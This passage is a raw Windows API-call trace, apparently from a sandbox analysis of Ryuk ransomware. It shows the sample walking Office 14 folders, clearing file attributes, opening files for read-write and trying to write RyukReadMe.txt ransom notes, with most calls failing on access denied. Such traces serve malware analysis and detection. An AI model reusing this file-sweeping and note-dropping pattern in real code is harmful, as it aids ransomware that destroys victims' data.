(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadata.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.608] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.608] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.608] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd", dwFileAttributes=0x80) returned 0 [0136.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadataresource.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.609] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.609] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.609] SetLastError (dwErrCode=0x0) [0136.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.609] GetLastError () returned 0x5 [0136.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.609] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.611] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.611] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.611] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2String.XSL", dwFileAttributes=0x80) returned 0 [0136.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2String.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\author2string.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.612] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.612] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2XML.XSL", dwFileAttributes=0x80) returned 0 [0136.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Author2XML.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\author2xml.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.612] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.613] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.613] SetLastError (dwErrCode=0x0) [0136.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.613] GetLastError () returned 0x5 [0136.613] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.613] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.613] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.621] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.621] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\AUTHOR.XSL", dwFileAttributes=0x80) returned 0 [0136.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\AUTHOR.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\author.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.622] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\TAG.XSL", dwFileAttributes=0x80) returned 0 [0136.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\TAG.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\tag.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.623] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.623] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\TITLE.XSL", dwFileAttributes=0x80) returned 0 [0136.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\TITLE.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\title.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.624] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.624] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\YEAR.XSL", dwFileAttributes=0x80) returned 0 [0136.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\YEAR.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\year.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.625] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.625] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.625] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.625] SetLastError (dwErrCode=0x0) [0136.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.625] GetLastError () returned 0x5 [0136.625] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.625] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.625] SetLastError (dwErrCode=0x0) [0136.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.625] GetLastError () returned 0x5 [0136.625] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.625] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.627] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.627] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\APA.XSL", dwFileAttributes=0x80) returned 0 [0136.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\APA.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\apa.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.627] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.627] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.627] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\CHICAGO.XSL", dwFileAttributes=0x80) returned 0 [0136.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.628] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GB.XSL", dwFileAttributes=0x80) returned 0 [0136.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.629] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.629] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GostName.XSL", dwFileAttributes=0x80) returned 0 [0136.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.630] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.630] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GostTitle.XSL", dwFileAttributes=0x80) returned 0 [0136.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.631] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\ISO690.XSL", dwFileAttributes=0x80) returned 0 [0136.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.631] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.632] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\ISO690Nmerical.XSL", dwFileAttributes=0x80) returned 0 [0136.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.633] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.633] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\MLA.XSL", dwFileAttributes=0x80) returned 0 [0136.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\MLA.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\mla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.634] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\SIST02.XSL", dwFileAttributes=0x80) returned 0 [0136.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.634] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.634] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.634] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\TURABIAN.XSL", dwFileAttributes=0x80) returned 0 [0136.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.635] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.635] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.636] SetLastError (dwErrCode=0x0) [0136.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.639] GetLastError () returned 0x5 [0136.639] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.639] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.639] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.639] SetLastError (dwErrCode=0x0) [0136.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.639] GetLastError () returned 0x5 [0136.639] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.639] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.639] SetLastError (dwErrCode=0x0) [0136.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.639] GetLastError () returned 0x5 [0136.639] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.639] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.641] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.641] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.641] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR", dwFileAttributes=0x80) returned 0 [0136.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART1.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart1.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.642] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.642] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR", dwFileAttributes=0x80) returned 0 [0136.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart10.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.642] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.643] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.643] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR", dwFileAttributes=0x80) returned 0 [0136.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.643] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.644] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR", dwFileAttributes=0x80) returned 0 [0136.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.644] CloseHandle 